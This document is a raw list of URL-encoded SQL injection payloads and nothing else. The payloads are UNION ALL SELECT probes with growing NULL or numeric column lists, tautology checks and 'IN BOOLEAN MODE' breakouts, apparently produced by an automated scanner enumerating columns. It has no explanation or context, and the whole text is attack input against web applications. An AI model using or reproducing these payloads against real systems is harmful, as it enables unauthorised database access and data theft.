1234.5%27%2B%28SELECT%20aUiP%20WHERE%203713%3D3713%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20HNpW%20WHERE%207600%3D7600%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20PKfU%20WHERE%206509%3D6509%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20bqiZ%20WHERE%203021%3D3021%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20HlTV%20WHERE%203587%3D3587%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20qqQF%20WHERE%201039%3D1039%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20FYwH%20WHERE%206192%3D6192%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20Nabo%20WHERE%204856%3D4856%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20AedU%20WHERE%208600%3D8600%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27NgPu%27%20WHERE%201380%3D1380%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27FlWe%27%20WHERE%209271%3D9271%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27oTLq%27%20WHERE%209447%3D9447%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27jBgb%27%20WHERE%206430%3D6430%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27oCLF%27%20WHERE%205748%3D5748%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27aGgX%27%20WHERE%209551%3D9551%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27Soaq%27%20WHERE%205521%3D5521%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27ETyp%27%20WHERE%204659%3D4659%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27eTGe%27%20WHERE%206871%3D6871%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%2B%28SELECT%20%27iDmA%27%20WHERE%201481%3D1481%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 -2536%29%20UNION%20ALL%20SELECT%202185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185%2C2185--%20 -5114%29%20UNION%20ALL%20SELECT%205991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991%2C5991--%20 -6822%29%20UNION%20ALL%20SELECT%207057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057%2C7057--%20 -9259%29%20UNION%20ALL%20SELECT%204276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276%2C4276--%20 -7525%29%20UNION%20ALL%20SELECT%202683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683%2C2683--%20 -3385%29%20UNION%20ALL%20SELECT%208373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373%2C8373--%20 -2175%29%20UNION%20ALL%20SELECT%203913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913%2C3913--%20 -4497%29%20UNION%20ALL%20SELECT%202192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192%2C2192--%20 -4492%29%20UNION%20ALL%20SELECT%204523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523%2C4523--%20 -8501%29%20UNION%20ALL%20SELECT%209054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054%2C9054--%20 -7760%27%29%20UNION%20ALL%20SELECT%202631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631%2C2631--%20 -4704%27%29%20UNION%20ALL%20SELECT%209985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985%2C9985--%20 -9679%27%29%20UNION%20ALL%20SELECT%204121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121%2C4121--%20 -4667%27%29%20UNION%20ALL%20SELECT%206600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600%2C6600--%20 -1994%27%29%20UNION%20ALL%20SELECT%202799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799%2C2799--%20 -2451%27%29%20UNION%20ALL%20SELECT%201747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747%2C1747--%20 -4854%27%29%20UNION%20ALL%20SELECT%205008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008%2C5008--%20 -4641%27%29%20UNION%20ALL%20SELECT%209573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573%2C9573--%20 -6924%27%29%20UNION%20ALL%20SELECT%202216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216%2C2216--%20 -9730%27%29%20UNION%20ALL%20SELECT%206772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772%2C6772--%20 -7902%27%20UNION%20ALL%20SELECT%206241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241%2C6241--%20 -1654%27%20UNION%20ALL%20SELECT%208809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809%2C8809--%20 